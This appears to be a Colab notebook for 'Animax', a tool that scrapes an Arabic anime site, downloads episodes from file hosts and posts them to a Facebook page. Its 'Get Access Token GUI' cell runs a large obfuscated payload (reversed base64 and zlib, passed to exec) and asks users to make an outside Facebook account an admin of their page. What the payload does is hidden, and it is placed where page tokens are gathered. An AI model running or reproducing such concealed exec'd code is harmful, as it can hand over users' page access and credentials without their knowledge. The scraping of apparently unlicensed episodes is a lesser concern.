<a href="https://colab.research.google.com/github/RadouaneElarfaoui/Animax/blob/main/%D9%90Animax_v1_1_0.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Step 0 ✅ :   
## *Download requirements and initialise program*

In [ ]:
# @title Download requirements :
import subprocess

libraries = "gradio,mega.py,youtube-dl"

def install_requirements():
    """Installe toutes les bibliothèques requises"""
    failures = []
    for library in libraries.split(","):
        result = subprocess.run(['pip', 'install', library], capture_output=True, text=True)
        if result.returncode != 0:
            print(f"Erreur lors de l'installation de {library} :")
            print(result.stderr)
            failures.append(library)
    if failures:
        print("❌ Erreur lors de l'installation des requirements :")
        for failure in failures:
            print(f" - {failure}")
    else:
        print("✅ Toutes les requirements ont été installées avec succès.")

install_requirements()

✅ Toutes les requirements ont été installées avec succès.


In [ ]:
# @title VideoDownloader
import os
import gdown
from mega import Mega
import youtube_dl
import logging

class VideoDownloader:
    def __init__(self, destination_folder="./videos"):
        self.destination_folder = destination_folder
        if not os.path.exists(self.destination_folder):
            os.makedirs(self.destination_folder)

        self.dl_functions = {
            "drive": self.dl_drive,
            "mega": self.dl_mega,
            "4shared": self.dl_4shared,
            "ok": self.dl_ok
        }

        self.priority_order = ["drive", "mega", "4shared", "ok"]

    def dl_drive(self, file_id, filename=None):
        url = f"https://drive.google.com/uc?id={file_id}"
        output = os.path.join(self.destination_folder, filename) if filename else os.path.join(self.destination_folder, f"{file_id}.mp4")
        try:
            gdown.download(url, output, quiet=False)
            return output
        except Exception as e:
            logging.error(f"Erreur de téléchargement Drive : {file_id} - {str(e)}")
            return None

    def dl_mega(self, video_id, filename=None):
        link = f'https://mega.nz/file/{video_id}'
        mega = Mega()
        try:
            m = mega.login()
            fichier = m.download_url(link, self.destination_folder)
            if filename:
                new_path = os.path.join(self.destination_folder, filename)
                os.rename(fichier, new_path)
                return new_path
            return os.path.join(self.destination_folder, os.path.basename(fichier))
        except Exception as e:
            logging.error(f"Erreur de téléchargement Mega : {video_id} - {str(e)}")
            return None

    def dl_4shared(self, video_id, filename=None):
        video_url = f"https://www.4shared.com/video/{video_id}"
        file_path = os.path.join(self.destination_folder, filename) if filename else os.path.join(self.destination_folder, f"{video_id}.mp4")
        ydl_opts = {'outtmpl': file_path, 'format': 'best'}
        try:
            with youtube_dl.YoutubeDL(ydl_opts) as ydl:
                ydl.download([video_url])
            return file_path
        except Exception as e:
            logging.error(f"Erreur de téléchargement 4shared : {video_id} - {str(e)}")
            return None

    def dl_ok(self, video_id, filename=None):
        video_url = f"https://ok.ru/video/{video_id}"
        file_path = os.path.join(self.destination_folder, filename) if filename else os.path.join(self.destination_folder, f"{video_id}.mp4")
        ydl_opts = {'outtmpl': file_path, 'format': 'best'}
        try:
            with youtube_dl.YoutubeDL(ydl_opts) as ydl:
                ydl.download([video_url])
            return file_path
        except Exception as e:
            logging.error(f"Erreur de téléchargement OK : {video_id} - {str(e)}")
            return None

    def download(self, data_anime, filename=None):
        for priority in self.priority_order:
            for anime in data_anime:
                if anime["class"] == priority:
                    try:
                        file_path = self.dl_functions[priority](anime["data"], filename=filename)
                        if file_path is not None:
                            return file_path
                    except Exception as e:
                        logging.error(f"Erreur de téléchargement : {anime['data']} ({priority}) - {str(e)}")
        return None
# Exemple d'utilisation
# if __name__ == "__main__":

#     # Données d'exemple
#     data_anime = [{'class': 'vanfem', 'data': 'm6ly7c502krqx03', 'source': 'ani', 'type': 'vanfem'}, {'class': 'upvideo', 'data': 'kpalehqnk4pi', 'source': 'ani', 'type': 'upvideo'}, {'class': 'dood', 'data': 'yvukjptrxvsi', 'source': 'ani', 'type': 'dood'}, {'class': 'mp4upload', 'data': 'vya40is25243', 'source': 'ani', 'type': 'mp4upload'}, {'class': 'mega', 'data': '0y53CBSb#_pfbW91ADcTPjjqAbKLvnUeVMiF4Ia9TS7s_cP8NKGo', 'source': 'ani', 'type': 'mega'}, {'class': '4shared', 'data': 'AoRYLkPWiq', 'source': 'ani', 'type': '4shared'}, {'class': 'drive', 'data': '1967ma20g3VWm5w2ReSYOWdIzZwryGqPU', 'source': 'ani', 'type': 'drive'}, {'class': 'mega', 'data': 'Anh3SACZ#2H2aMrf44IksjLzmfBnPG1Xt_LicPqa7pEyVcA6yHOU', 'source': 'ani', 'type': 'mega'}, {'class': '4shared', 'data': 'Bje2D8Poiq', 'source': 'ani', 'type': '4shared'}, {'class': 'drive', 'data': '1cEfl1g-zgxRZr7Wm3IlL4dksf1DDZN2E', 'source': 'ani', 'type': 'drive'}]

#     # Création de l'instance du downloader
#     downloader = VideoDownloader(destination_folder="./downloads")

#     # Tentative de téléchargement
#     result = downloader.download(data_anime)

#     if result:
#         print(f"Fichier téléchargé avec succès : {result}")
#     else:
#         print("Échec du téléchargement pour toutes les sources.")

In [ ]:
# @title Anime Data Parcer
import requests
from bs4 import BeautifulSoup
import json
# from IPython.display import clear_output
# clear_output()


def get_anime_data(url):
    response = requests.get(url)
    #print(response.text)
    soup = BeautifulSoup(response.text, 'html.parser')

    title = soup.find('h1', class_='entry-title').text.strip()
    info_content = soup.find('div', class_='info-content')
    info = str(info_content) if info_content else ""

    # Extraction de l'URL de l'image
    image_element = soup.find('img', alt="صورة وغلاف الأنمي")
    image_url = image_element['src'].split('?')[0] if image_element else None

    # Parse the info content
    soup_info = BeautifulSoup(info, 'html.parser')
    data = {}
    for span in soup_info.find_all('span'):
        key = span.b.text.strip(':')
        value = span.b.next_sibling.strip()
        if span.a:
            value = span.a.text
        elif span.time:
            value = span.time.text
        data[key] = value

    genres = [a.text for a in soup_info.find('div', class_='genxed').find_all('a')] if soup_info.find('div', class_='genxed') else []
    data['صنف'] = ', '.join(genres)

    # Store the key-value pairs
    info_dict = data.copy()

    # Calculate the middle index for splitting
    middle_index = len(data) // 2

    # Splitting data into two dictionaries
    data_part1 = dict(list(data.items())[:middle_index])
    data_part2 = dict(list(data.items())[middle_index:])

    # Generate HTML for the two tables
    def create_table_html(data):
        table_html = f"""
        <table border="1" style="width: 100%; border-collapse: collapse; background-color: white; box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.1); padding: 20px;">
        """
        for key, value in data.items():
            table_html += f"""
              <tr>
                <td style="padding: 10px;text-align: right;">{value}</td>
                <td style="background-color: #e0f2f7; padding: 10px;text-align: right;">{key}</td>
              </tr>
            """
        table_html += """
        </table>
        """
        return table_html

    table_html_part1 = create_table_html(data_part1)
    table_html_part2 = create_table_html(data_part2)

    # Combine the two tables side-by-side
    combined_table_html = f"""
    <div style="display: grid; grid-template-columns: 1fr 1fr; gap: 30px;">
        <div>
            {table_html_part2}
        </div>
        <div>
            {table_html_part1}
        </div>
    </div>
    """
    info_html = combined_table_html

    ep_numbers = soup.find('div', id='EpList1').find_all('div')
    ep_list = [ep_number.text.strip() for ep_number in ep_numbers]
    servers = soup.find('div', id='ServerList1').find_all('div', class_='serversss')

    all_data = []
    for index, server in enumerate(servers):
        li_elements = server.find_all('li')
        data = {
            "id": index,
            "Episode": ep_list[index] if index < len(ep_list) else "Unknown",
            "Anime": title,
            "Image": image_url,
            **info_dict,
            "quality-data-FHD": [],
            "quality-data-HD": [],
            "quality-data-SD": []
        }
        for li in li_elements:
            quality = li.get('quality-data')
            item = {
                "class": li.get('class')[0] if li.get('class') else None,
                "data": li.get('data'),
                "source": li.get('source'),
                "type": li.get('type')
            }
            if quality in ["FHD", "HD", "SD"]:
                data[f"quality-data-{quality}"].append(item)
        all_data.append(data)

    final_data = {
        "Title": title,
        "Image": image_url,  # Nouvelle ligne ajoutée
        "Info": {
            "html": info_html,
            "dict": info_dict
        },
        "Episodes": all_data
    }
    return final_data

url="https://www.animedar.xyz/anime/shingeki-no-kyojin-the-final-season-kanketsu-hen/"

print(json.dumps(get_anime_data(url), indent=2,ensure_ascii=False))

# Effacer les sorties
from IPython.display import clear_output
clear_output()

{
  "Title": "Shingeki no Kyojin: The Final Season – Kanketsu-hen",
  "Image": "https://i0.wp.com/www.animedar.xyz/wp-content/uploads/2023/09/1695000489-6634-131078.jpg",
  "Info": {
    "html": "\n    <div style=\"display: grid; grid-template-columns: 1fr 1fr; gap: 30px;\">\n        <div>\n            \n        <table border=\"1\" style=\"width: 100%; border-collapse: collapse; background-color: white; box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.1); padding: 20px;\">\n        \n              <tr>\n                <td style=\"padding: 10px;text-align: right;\">2</td>\n                <td style=\"background-color: #e0f2f7; padding: 10px;text-align: right;\">الحلقات</td>\n              </tr>\n            \n              <tr>\n                <td style=\"padding: 10px;text-align: right;\">Censored</td>\n                <td style=\"background-color: #e0f2f7; padding: 10px;text-align: right;\">الرقابة</td>\n              </tr>\n            \n              <tr>\n                <td style=\"paddi

#  Step 1 ✅: **Connecting Your Page to Animax :**

This guide outlines how to connect your Facebook page to Animax. Choose one of the following options:

**Option 1: Simplified Setup (Using Alfred Pro)**

1.  Add the [Alfred Pro](https://www.facebook.com/pro.alfred.fb)  as an admin to your Facebook Page.
2. Run the `Get Access Token GUI` and follow the steps to obtain your Page Access Token and Page ID.
3. Enter these credentials in the `set your page credit` section and run the script.

**Option 2: Manual Setup (Using Facebook for Developers)**

1. **Create a Facebook Developer Account:** If you don't already have one, create a Facebook Developer account.
2. **Create a Facebook App:** Create a new app within your Facebook Developer account.
3. **Add Permissions:** Add the necessary permissions for your app to access your Facebook Page.
4. **Generate Access Token:** Generate an access token for your app.
5. **Obtain Credentials:** Retrieve your Page Access Token, Page ID, and App Secret.
6. **Enter Credentials:** Enter these credentials in the `set your page credit` section and run the script.

In [ ]:
# @title Get Access Token GUI (optional) 🖥️
# @markdown ## Arabic:
# @markdown - ⚠️ هذه الخطوة اختيارية.
# @markdown - تأكد أنك موافق على إعطاء البرنامج صلاحية بالنشر باسم صفحتك.
# @markdown - إذا لم يكن لديك رمز وصول للصفحة، أو إذا كنت لا تعرف كيفية الحصول على واحد، أو إذا واجهت صعوبات في الطريقة للحصول على رمز وصول للصفحة، استخدم هذه الطريقة السهلة.
# @markdown - يجب عليك تعيين حساب فيسبوك [Alfred Pro](https://www.facebook.com/pro.alfred.fb) مشرف على صفحتك.

# @markdown ## English:
# @markdown - ⚠️ This step is optional.
# @markdown - Make sure you agree to grant the program permission to post on behalf of your page.
# @markdown - If you don't have an access token for the page, if you don't know how to get one, or if you encounter difficulties with the method to obtain an access token for the page, use this easy method.
# @markdown - You need to assign the [Alfred Pro](https://web.facebook.com/pro.alfred.fb) Facebook account as an admin on your page.



_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'=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